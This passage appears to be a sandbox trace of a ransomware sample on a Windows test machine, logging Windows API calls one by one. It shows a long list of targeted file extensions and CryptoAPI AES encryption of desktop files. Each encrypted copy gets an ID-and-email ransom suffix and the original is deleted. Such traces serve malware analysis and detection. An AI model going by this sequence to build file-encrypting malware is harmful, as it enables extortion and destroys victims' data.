m.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".gif") returned=".gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.590] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.591] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.591] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.593] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x16a5f, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x16a5f, lpOverlapped=0x0) returned 1
	[0182.606] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.606] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0182.609] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.609] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.609] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.609] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.609] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.609] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb98f0) returned 1
	[0182.609] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.610] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x16a5f, dwBufLen=0x16a5f | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x16a60) returned 1
	[0182.613] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.614] RtlMoveMemory (in: Destination=0xff3be8, Source=0xfdd180, Length=0x16a5f | out: Destination=0xff3be8) 
	[0182.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.614] CryptEncrypt (in: hKey=0xfb98f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff3be8*, pdwDataLen=0x18bc0c*=0x16a5f, dwBufLen=0x16a60 | out: pbData=0xff3be8*, pdwDataLen=0x18bc0c*=0x16a60) returned 1
	[0182.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.617] CryptDestroyKey (hKey=0xfb98f0) returned 1
	[0182.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.617] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0182.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.617] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0182.618] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.618] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.618] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.619] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.620] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 91
	[0182.620] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.620] WriteFile (in: hFile=0x388, lpBuffer=0xff3be8*, nNumberOfBytesToWrite=0x16a60, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff3be8*, lpNumberOfBytesWritten=0x18c068*=0x16a60, lpOverlapped=0x0) returned 1
	[0182.627] CloseHandle (hObject=0x388) returned 1
	[0182.628] CloseHandle (hObject=0x384) returned 1
	[0182.628] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif")) returned 1
	[0182.636] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wictqbu5lb69gnf.gif")) returned 0
	[0182.636] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d7777c0, ftCreationTime.dwHighDateTime=0x1d97052, ftLastAccessTime.dwLowDateTime=0xea2460e0, ftLastAccessTime.dwHighDateTime=0x1d9743d, ftLastWriteTime.dwLowDateTime=0xea2460e0, ftLastWriteTime.dwHighDateTime=0x1d9743d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XO5lwhfEXk", cAlternateFileName="XO5LWH~1")) returned 1
	[0182.636] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa04c2c10, ftCreationTime.dwHighDateTime=0x1d97653, ftLastAccessTime.dwLowDateTime=0x41550ab0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0x41550ab0, ftLastWriteTime.dwHighDateTime=0x1d97694, nFileSizeHigh=0x0, nFileSizeLow=0x15c13, dwReserved0=0x0, dwReserved1=0x0, cFileName="Xz06.swf", cAlternateFileName="")) returned 1
	[0182.636] lstrcmpW (lpString1="Xz06.swf", lpString2="..") returned 1
	[0182.637] lstrcmpW (lpString1="Xz06.swf", lpString2=".") returned 1
	[0182.637] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.637] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="Xz06.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Xz06.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Xz06.swf"
	[0182.637] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Xz06.swf") returned 38
	[0182.637] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.637] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\Xz06.swf", cchLength=0x26 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf") returned 0x26
	[0182.637] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.637] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.638] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf"
	[0182.638] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf") returned 38
	[0182.638] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.638] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0182.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.639] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0182.639] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0182.639] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0182.639] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xz06.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0182.645] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x15c13, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x15c13, lpOverlapped=0x0) returned 1
	[0182.649] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.649] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcba18) returned 1
	[0182.651] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.651] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
